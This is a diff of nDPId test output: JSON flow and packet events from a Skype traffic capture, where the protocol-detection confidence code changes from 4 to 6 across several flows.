00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XMQAAEARBHrAqAEiQAQXrTLdnFEAIKzLnEACNoZuauEq3ADhWmqb7oTzdlIdyJ9N"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lioAAEARmezAqAEinTfrmTLdnFcAJ4lunEIC66wPUwGEAyW45bIdeHP6QiT0x60Zbz70ciSKMQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":845,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA180cAAEARCDTAqAEib91NlTLdnF4AIdImnEQCEhW3FidGQ7GJtk\/GLqF7d8vgcOXTwQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} @@ -478,10 +478,10 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxa4AAEAR02nAqAEinTeCkjLdnFoALfPInEYCTMX9D0zWqHZlar9rRJ4nLA7eV\/fFhp0UOFHwVjJRpWMfLA=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FOcAAEARGqjAqAEi1cezjzLdnFYAKftynEgChXSqdM1qvdY\/tcyUx+hTJaaUvSW+LNUHctwmtBhJ"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -498,13 +498,13 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5rAwAAEAR7JDAqAEiQTffFTLdnFsAJTYGnEoCYEAkEhPrC3cXaZ2QhtIeOoxIY9w9Ekoojl8="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAAySgUAAEARsYLAqAEib91NjDLdnEMAHpNUnEwCeUQO24lPxsdSE1aywi7G9Ehfag=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":899,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3KwsAAEARbhfAqAEinTeCkjLdgQkAI6nfnE4CnxxG0E+kNYaCqSmEqqaVzyCf2xFtLT6I"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":900,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675567,"flow_last_seen":1431969675567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1431969675567,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1431969675567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675567,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoxtNAAEAGPGLAqAEiEaxkJMNoAbucCLSTZ4D+ClAR\/\/\/87QAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1431969675708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675708,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+5v3UomwKgBIpxPw4sbzRl\/lAe91KASOJBx0gAAAgQFrAQCCApNf6NJPiML1gEDAwk="} @@ -513,16 +513,16 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":1431969675716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969675716,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoVvpAAEAGrDvAqAEiEaxkJMNoAbucCLSUZ4D+C1AQ\/\/\/87AAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPisQAAEARbGbAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": 